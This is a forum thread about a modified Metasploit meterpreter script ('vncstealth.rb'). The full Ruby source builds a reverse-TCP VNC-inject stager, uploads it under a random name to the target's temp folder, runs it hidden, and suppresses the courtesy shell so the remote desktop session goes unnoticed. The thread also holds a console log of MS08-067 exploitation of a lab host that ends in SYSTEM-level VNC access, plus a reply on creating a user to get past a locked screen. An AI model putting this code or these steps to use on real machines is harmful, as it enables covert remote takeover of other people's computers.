msf vnc courtesy shell

[prowl3r]

I've been testing the new vnc meterpreter script hdm just wrote, as per:

Twitter / HD Moore: RunVNC: quickly spawn a V ...

It works just fine. However, it pops a courtesy shell, so I added:

Code:

set DisableCourtesyShell TRUE

just before executing the exploit. The parameter was properly echoed. But the courtesy shell keeps showing.

Has anyone else tried this?

Edit. Possibly this is due it's a meterpreter script, not a payload. Just wondering if there's a command available to disable it.

Edit 2.

Ok, guys, flooded by replies

Nevermind, I modified the original script vnc.rb as follows:

Code:

# $Id: vnc.rb 7872 2009-12-15 05:10:33Z hdm $

#
# Meterpreter script for obtaining a quick VNC session
#

session = client

#
# Options
#
opts = Rex::Parser::Arguments.new(
	"-h"  => [ false,  "This help menu"],
	"-r"  => [ true,   "The IP of the system running Metasploit listening for the connect back"],
	"-p"  => [ true,   "The port on the remote host where Metasploit is listening (default: 4545)"],
	"-D"  => [ false,  "Disable the automatic multi/handler (use with -r to accept on another system)"]
)

#
# Default parameters
#

rhost    = Rex::Socket.source_address("1.2.3.4")
rport    = 4545
autoconn = true

#
# Option parsing
#
opts.parse(args) do |opt, idx, val|
	case opt
	when "-h"
		print_line(opts.usage)
		return
	when "-r"
		rhost = val
	when "-p"
		rport = val.to_i
	when "-D"
		autoconn = false
	end
end

#
# Create the agent EXE
#
print_status("Creating a VNC stager: LHOST=#{rhost} LPORT=#{rport})")
pay = client.framework.payloads.create("windows/vncinject/reverse_tcp")
pay.datastore['LHOST'] = rhost
pay.datastore['LPORT'] = rport
raw  = pay.generate

exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)
print_status("VNC stager executable #{exe.length} bytes long")


#
# Upload to the filesystem
#

tempdir = client.fs.file.expand_path("%TEMP%")
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
tempexe.gsub!("\\\\", "\\")

fd = client.fs.file.new(tempexe, "wb")
fd.write(exe)
fd.close

print_status("Uploaded the VNC agent to #{tempexe} (must be deleted manually)")

#
# Setup the multi/handler if requested
#

if(autoconn)
	mul = client.framework.exploits.create("multi/handler")
	mul.datastore['PAYLOAD']   = "windows/vncinject/reverse_tcp"
	mul.datastore['LHOST']     = rhost
	mul.datastore['LPORT']     = rport
	mul.datastore['EXITFUNC']  = 'process'
	mul.datastore['ExitOnSession'] = true
	mul.datastore['DisableCourtesyShell'] = true

	mul.exploit_simple(
		'Payload'        => mul.datastore['PAYLOAD'],
		'RunAsJob'       => true
	)
end

#
# Execute the agent
#
print_status("Executing the VNC agent with endpoint #{rhost}:#{rport}...")
proc = session.sys.process.execute(tempexe, nil, {'Hidden' => true})

Then, saved as:

Code:

/pentest/exploits/framework3/scripts/meterpreter/vncstealth.rb

And tested it:

Code:

                                  _       _
             _                   | |     (_)_
 ____   ____| |_  ____  ___ ____ | | ___  _| |_
|    \ / _  )  _)/ _  |/___)  _ \| |/ _ \| |  _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
                           |_|


       =[ metasploit v3.3.3-dev [core:3.3 api:1.0]
+ -- --=[ 476 exploits - 220 auxiliary
+ -- --=[ 262 payloads - 22 encoders - 8 nops
       =[ svn r7893 updated today (2009.12.16)

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.2
RHOST => 192.168.1.2
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.6
LHOST => 192.168.1.6
msf exploit(ms08_067_netapi) > set LPORT 4444
LPORT => 4444
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on port 4444[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 2 - lang:English[*] Selected Target: Windows XP SP2 English (NX)[*] Triggering the vulnerability...[*] Sending stage (723456 bytes)[*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.2:1035)

meterpreter > run vncstealth[*] Creating a VNC stager: LHOST=192.168.1.6 LPORT=4545)[*] VNC stager executable 87552 bytes long[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\udoGvQNkBM.exe (must be deleted manually)[*] Executing the VNC agent with endpoint 192.168.1.6:4545...[*] VNC Server session 2 opened (192.168.1.6:4545 -> 192.168.1.2:1036)
meterpreter > Connected to RFB server, using protocol version 3.3
No authentication needed
Desktop name "VNCShell [SYSTEM@LAB-VICTIM] - Full Access"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using shared memory PutImage
Same machine: preferring raw encoding

It's bloody silent now. No pop-up courtesy shell.

[fb1h2s]

WELL HDM IS SUPER wise and thats the reason why he purposely included the vnc courtesy shell, well even I dnt knew the reason until one of my friends explained the reason,

Well at normal conditions when a system is left unused the system either get screen saver password protected , so when we get a courtesy shell you could unlock the machine by creating a new user as u have a shell